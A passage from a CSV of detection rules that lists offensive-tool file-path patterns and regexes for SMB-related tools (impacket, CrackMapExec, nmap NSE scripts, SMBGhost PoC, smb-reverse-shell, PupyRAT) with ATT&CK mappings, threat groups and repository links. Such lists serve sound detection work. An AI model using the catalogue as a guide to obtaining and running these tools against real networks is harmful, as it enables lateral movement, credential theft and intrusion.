Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11363" "*/SMBeagle*",".{0,1000}\/SMBeagle.{0,1000}","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","N/A","9","8","712","80","2025-01-21T22:34:00Z","2021-05-31T19:46:57Z","11364" "*/smb-enum-domains.nse*",".{0,1000}\/smb\-enum\-domains\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11365" "*/smb-enum-groups.nse*",".{0,1000}\/smb\-enum\-groups\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11366" "*/smb-enum-processes.nse*",".{0,1000}\/smb\-enum\-processes\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11367" "*/smb-enum-services.nse*",".{0,1000}\/smb\-enum\-services\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11368" "*/smb-enum-sessions.nse*",".{0,1000}\/smb\-enum\-sessions\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11369" "*/smb-enum-shares.nse*",".{0,1000}\/smb\-enum\-shares\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11370" "*/smb-enum-users.nse*",".{0,1000}\/smb\-enum\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11371" "*/smbexec.py*",".{0,1000}\/smbexec\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","11372" "*/smbexec.py*",".{0,1000}\/smbexec\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","11373" "*/smbexec.py*",".{0,1000}\/smbexec\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","11374" "*/smb-flood.nse*",".{0,1000}\/smb\-flood\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11375" "*/SMBForwarder.txt*",".{0,1000}\/SMBForwarder\.txt.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","11376" "*/SMBGhost/scanner.py*",".{0,1000}\/SMBGhost\/scanner\.py.{0,1000}","offensive_tool_keyword","SMBGhost","Simple scanner for CVE-2020-0796 - SMBv3 RCE.","T1210 - T1573 - T1553 - T1216 - T1027","TA0006 - TA0011 - TA0008","N/A","N/A","Discovery","https://github.com/ollypwn/SMBGhost","1","1","N/A","N/A","7","7","678","194","2020-10-01T08:36:29Z","2020-03-11T15:21:27Z","11377" "*/SMBGhost_RCE*",".{0,1000}\/SMBGhost_RCE.{0,1000}","offensive_tool_keyword","SMBGhost_RCE_PoC","RCE PoC for CVE-2020-0796 SMBGhost","T1210 - T1059 - T1505 - T1021 - T1027","TA0001 - TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation 
tool","https://github.com/chompie1337/SMBGhost_RCE_PoC","1","1","N/A","N/A","N/A","10","1339","349","2020-07-02T18:51:47Z","2020-06-02T00:14:47Z","11378" "*/SMBGrab.pl*",".{0,1000}\/SMBGrab\.pl.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","1","N/A","N/A","9","2","165","20","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z","11379" "*/SMBHunt.pl*",".{0,1000}\/SMBHunt\.pl.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","1","N/A","N/A","9","2","165","20","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z","11380" "*/smbldap.py*",".{0,1000}\/smbldap\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","11381" "*/SMBList.pl*",".{0,1000}\/SMBList\.pl.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","1","N/A","N/A","9","2","165","20","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z","11382" "*/smblogin.ps1*",".{0,1000}\/smblogin\.ps1.{0,1000}","offensive_tool_keyword","Minimalistic-offensive","A repository of tools for pentesting of restricted and isolated environments.","T1110 - T1046 - T1021 - T1203 - T1485","TA0006 - TA0007 - TA0008","N/A","Dispossessor","Discovery","https://github.com/InfosecMatter/Minimalistic-offensive-security-tools","1","1","N/A","N/A","7","6","562","121","2021-10-26T11:04:46Z","2020-05-10T17:40:31Z","11383" "*/smb-ls.nse*",".{0,1000}\/smb\-ls\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11384" "*/smbmap.git*",".{0,1000}\/smbmap\.git.{0,1000}","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","MuddyWater - Dispossessor","Discovery","https://github.com/ShawnDEvans/smbmap","1","1","N/A","N/A","10","10","1890","359","2025-02-28T18:09:10Z","2015-03-16T13:15:00Z","11385" "*/smbmap.py*",".{0,1000}\/smbmap\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","11386" "*/smbmapDump*",".{0,1000}\/smbmapDump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black 
Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","11387" "*/smb-mbenum.nse*",".{0,1000}\/smb\-mbenum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11388" "*/smb-os-discovery.nse*",".{0,1000}\/smb\-os\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11389" "*/smbpasswd.py*",".{0,1000}\/smbpasswd\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","11390" "*/smb-print-text.nse*",".{0,1000}\/smb\-print\-text\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11391" "*/smb-protocols.nse*",".{0,1000}\/smb\-protocols\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11392" "*/smb-psexec.nse*",".{0,1000}\/smb\-psexec\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11393" "*/smbrelayserver.py*",".{0,1000}\/smbrelayserver\.py.{0,1000}","offensive_tool_keyword","NtlmRelayToEWS","ntlmRelayToEWS is a tool for performing ntlm relay attacks on Exchange Web Services (EWS)","T1212 - T1557 - T1040 - T1078","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/Arno0x/NtlmRelayToEWS","1","1","N/A","N/A","10","4","331","60","2018-01-15T12:48:02Z","2017-10-13T18:00:50Z","11394" "*/smbrelayx.exe*",".{0,1000}\/smbrelayx\.exe.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","11395" "*/smbrelayx.py*",".{0,1000}\/smbrelayx\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","11396" "*/smb-reverse-shell*",".{0,1000}\/smb\-reverse\-shell.{0,1000}","offensive_tool_keyword","smb-reverse-shell","A Reverse Shell which uses an XML file on an SMB share as a communication channel.","T1021.002 - T1027 - T1105","TA0008 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/r1cksec/smb-reverse-shell","1","1","N/A","N/A","10","10","17","0","2024-02-17T12:20:01Z","2022-01-16T21:02:14Z","11397" "*/smbscan-*.csv*",".{0,1000}\/smbscan\-.{0,1000}\.csv.{0,1000}","offensive_tool_keyword","smbscan","SMBScan is a tool to enumerate file shares on an internal network.","T1135 - T1046 - T1021","TA0007 - TA0043 - TA0008","N/A","APT22","Discovery","https://github.com/jeffhacks/smbscan","1","0","#linux","N/A","8","1","44","6","2025-03-24T01:55:30Z","2021-10-26T02:28:34Z","11398" "*/smbscan-*.log*",".{0,1000}\/smbscan\-.{0,1000}\.log.{0,1000}","offensive_tool_keyword","smbscan","SMBScan is a tool to enumerate file shares on an internal network.","T1135 - T1046 - T1021","TA0007 - TA0043 - TA0008","N/A","APT22","Discovery","https://github.com/jeffhacks/smbscan","1","0","#linux","N/A","8","1","44","6","2025-03-24T01:55:30Z","2021-10-26T02:28:34Z","11399" 
"*/smbscan.git*",".{0,1000}\/smbscan\.git.{0,1000}","offensive_tool_keyword","smbscan","SMBScan is a tool to enumerate file shares on an internal network.","T1135 - T1046 - T1021","TA0007 - TA0043 - TA0008","N/A","APT22","Discovery","https://github.com/jeffhacks/smbscan","1","1","N/A","N/A","8","1","44","6","2025-03-24T01:55:30Z","2021-10-26T02:28:34Z","11400" "*/smbscan.py*",".{0,1000}\/smbscan\.py.{0,1000}","offensive_tool_keyword","smbscan","SMBScan is a tool to enumerate file shares on an internal network.","T1135 - T1046 - T1021","TA0007 - TA0043 - TA0008","N/A","APT22","Discovery","https://github.com/jeffhacks/smbscan","1","1","N/A","N/A","8","1","44","6","2025-03-24T01:55:30Z","2021-10-26T02:28:34Z","11401" "*/smb-security-mode.nse*",".{0,1000}\/smb\-security\-mode\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11402" "*/smbserver.py*",".{0,1000}\/smbserver\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","11403" "*/smbserver/smb_server.py*",".{0,1000}\/smbserver\/smb_server\.py.{0,1000}","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","Black Basta","Exploitation tool","https://github.com/BeetleChunks/SpoolSploit","1","1","N/A","N/A","N/A","6","555","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z","11404" "*/smb-server-stats.nse*",".{0,1000}\/smb\-server\-stats\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11405" "*/smb-signing-disabled-hosts.txt*",".{0,1000}\/smb\-signing\-disabled\-hosts\.txt.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","#linux","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","11406" "*/smbspider.py*",".{0,1000}\/smbspider\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","11407" "*/smbsr.db*",".{0,1000}\/smbsr\.db.{0,1000}","offensive_tool_keyword","SMBSR","Lookup for interesting stuff in SMB shares","T1110.001 - T1046 - T1021.002 - T1077.001 - T1069.002 - T1083 - T1018","TA0007 - TA0003 - TA0002 
- TA0001","N/A","N/A","Reconnaissance","https://github.com/oldboy21/SMBSR","1","1","N/A","N/A","N/A","2","149","23","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z","11408" "*/smbsr.db*",".{0,1000}\/smbsr\.db.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","#linux","N/A","7","2","149","23","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z","11409" "*/SMBSR.git*",".{0,1000}\/SMBSR\.git.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","1","N/A","N/A","7","2","149","23","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z","11410" "*/SMBSR.git*",".{0,1000}\/SMBSR\.git.{0,1000}","offensive_tool_keyword","SMBSR","Lookup for interesting stuff in SMB shares","T1110.001 - T1046 - T1021.002 - T1077.001 - T1069.002 - T1083 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Reconnaissance","https://github.com/oldboy21/SMBSR","1","1","N/A","N/A","N/A","2","149","23","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z","11411" "*/smbsr.log*",".{0,1000}\/smbsr\.log.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","1","#logfile #linux","N/A","7","2","149","23","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z","11412" "*/smbsr.log*",".{0,1000}\/smbsr\.log.{0,1000}","offensive_tool_keyword","SMBSR","Lookup for interesting stuff in SMB shares","T1110.001 - T1046 - T1021.002 - T1077.001 - T1069.002 - T1083 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Reconnaissance","https://github.com/oldboy21/SMBSR","1","1","#logfile #linux","N/A","N/A","2","149","23","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z","11413" "*/smbsr.py*",".{0,1000}\/smbsr\.py.{0,1000}","offensive_tool_keyword","smbsr","Lookup 